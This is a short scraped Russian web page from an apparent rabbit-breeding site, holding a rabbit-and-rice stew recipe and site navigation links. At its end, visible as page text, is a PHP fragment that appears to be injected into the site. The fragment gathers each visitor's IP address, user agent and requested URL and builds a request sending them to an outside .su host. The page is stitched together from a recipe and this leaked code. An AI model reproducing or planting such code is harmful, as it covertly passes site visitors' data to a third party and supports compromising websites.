| |||
Обработанную тушку разделить на кусочки по 40-50 г. Мясо обжарить в масле, залить водой (лучше бульоном), посолить по вкусу и варить до готовности. Затем в емкость положить жареный лук, масло, промытый рис, черный перец горошком, лавровый лист и поставить тушить на слабый огонь до готовности. Напишите мне На главную Фотоальбом Калифорнийская Серебристая Белый великан О пользе крольчатины Блюда из кролика $serverrobo = $_SERVER['REMOTE_ADDR']; $agentrobo = $_SERVER['HTTP_USER_AGENT'];$urlrobo = $_SERVER['HTTP_HOST'];$urlrobo .= $_SERVER['REQUEST_URI']; $agentrobo = str_replace(" ","", $agentrobo);$getroboip = "http://XN--80AVUE.xn--90acjmnnc1hybf.su/server.php?idishka=136498&ipishka=$serverrobo&useragentka=$agentrobo&urlrobotka=$urlrobo";?> ![]() |